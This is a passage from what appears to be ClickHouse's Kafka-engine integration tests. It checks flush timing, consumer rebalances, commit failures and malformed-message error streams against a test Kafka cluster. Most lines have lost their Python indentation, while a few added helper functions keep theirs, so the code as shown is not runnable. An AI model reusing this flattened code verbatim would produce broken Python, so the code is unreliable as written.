'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="flush_by_time", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
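# Why the test above expects exactly two distinct ts values and at least 15 rows:
# ts is MATERIALIZED now64(3), i.e. one value per flushed block, and comments
# elsewhere in this file treat the default flush interval as ~7.5 sec. A rough
# back-of-the-envelope check (the 7.5 sec figure is an assumption taken from
# those comments, not measured here):
def _flush_by_time_expectations_demo():
    observation_window = 18.0   # seconds the test sleeps before checking
    flush_interval = 7.5        # assumed default stream flush interval
    produce_period = 0.8        # one message every 0.8 sec in produce()
    completed_flushes = int(observation_window // flush_interval)  # == 2
    produced_messages = int(observation_window / produce_period)   # ~22
    assert completed_flushes == 2
    assert produced_messages >= 15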
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
    # more flushes can happen during the test; we only need to check the result of the first flush (the part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
    # 100 = the first block should contain exactly 100 messages (and rows),
    # flushed by kafka_max_block_size without waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_kafka_rebalance(kafka_cluster):
    NUMBER_OF_CONCURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
        # Waiting for test.kafka_consumerX to start consuming ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
    # I leave the last one working on purpose (so it finishes consuming after all the rebalances)
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
    # initialize PartitionManager earlier (it starts a container)
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
    # the tricky part here is that the disconnect should happen after the write prefix, but before the write suffix
    # sleepEachRow(0.25) * 20 rows gives a 5 sec window after "Polled batch of 20 messages",
    # while the materialized view is working, in which to inject the zookeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while writing suffix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
    # Waiting for test.kafka_consumer to start consuming
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
    # the tricky part here is that the disconnect should happen after the write prefix, but before we commit
    # sleepEachRow(0.25) * 20 rows gives a 5 sec window after "Polled batch of 20 messages",
    # while the materialized view is working, in which to pause the kafka container
kafka_cluster.pause_container('kafka1')
    # if we restore the connection too fast (<30 sec) librdkafka will not report any timeout
    # (the alternative is to decrease librdkafka's default session timeouts)
    #
    # when the delay is too long (>50 sec) the broker will decide to remove us from the consumer group
    # and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
    # After https://github.com/edenhill/librdkafka/issues/2631
    # the timeout triggers a rebalance, which makes further commits for the topic impossible
    # after getting back online. So we get duplicates in that scenario, but the situation is reported properly.
assert TSV(result) == TSV('42\t22\t22')
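# Why the expected result above is 42 rows but only 22 distinct keys: the first
# block of kafka_max_block_size = 20 rows is written to test.view, its commit
# fails while the broker is paused, and after reconnecting the consumer re-reads
# the topic from the start, writing all 22 rows again. The replay boundary is
# inferred from the comments above; the arithmetic itself is just bookkeeping.
def _duplicates_expectations_demo():
    produced = 22                          # messages produced at the top of the test
    first_block = 20                       # kafka_max_block_size rows written before the failed commit
    total_rows = first_block + produced    # the whole topic is re-read after reconnecting
    assert total_rows == 42                # matches TSV('42\t22\t22'); uniqExact(key) stays 22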
# if we reach the partition end we keep polling until kafka_max_block_size or flush_interval is reached.
# That behavior is a bit questionable - we could just take bigger pauses between polls instead,
# doing more work in a single pass and giving the thread more rest.
# But under peaky loads on the kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# We can also reach EOF simply because we drained librdkafka's internal queue too fast.
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
    # messages created here will be consumed immediately after the MV is created,
    # reaching the topic EOF.
    # But we should not flush immediately after reaching EOF, because
    # the next poll can return more data; we should respect kafka_flush_interval_ms
    # and try to form a bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
    # all subscriptions/assignments were done during the SELECT, so data starts flowing to test.destination
    # immediately after the MV is created
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
    # it should be a single part, i.e. a single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
def test_kafka_issue14202(kafka_cluster):
"""
    INSERT INTO a Kafka engine table from an empty SELECT subquery was leading to a failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons = 10, malformed = 0):
s = io.StringIO()
    # we don't care at which position the error is added
    # (the whole broken message is skipped), but we need to be
    # sure that at least one error is added,
    # otherwise the test will fail.
    error_pos = random.randint(0, jsons - 1)
    for i in range(jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
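# Note that gen_malformed_json() is still *valid JSON*; it is only "malformed"
# with respect to the table schema, because column i is Int64 and "n1000" cannot
# be parsed as an integer. A small self-contained way to inspect one generated
# message: walk the concatenated objects with json.JSONDecoder.raw_decode() and
# count the rows that would break Int64 parsing. The helper name is illustrative
# and it is not used by the tests.
def _count_schema_breaking_rows(payload):
    decoder = json.JSONDecoder()
    position, bad = 0, 0
    while position < len(payload):
        while position < len(payload) and payload[position].isspace():
            position += 1              # skip the ' ' separators written above
        if position >= len(payload):
            break
        obj, position = decoder.raw_decode(payload, position)
        try:
            int(obj['i'])
        except (TypeError, ValueError):
            bad += 1                   # e.g. "n1000": not parseable into Int64
    return bad
# e.g. _count_schema_breaking_rows(gen_message_with_jsons(10, 1)) == 1
#      _count_schema_breaking_rows(gen_message_with_jsons(10, 0)) == 0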
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
    # 64 bad messages, each containing one broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def test_kafka_formats_with_broken_message(kafka_cluster):
    # data was dumped from clickhouse itself in the following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
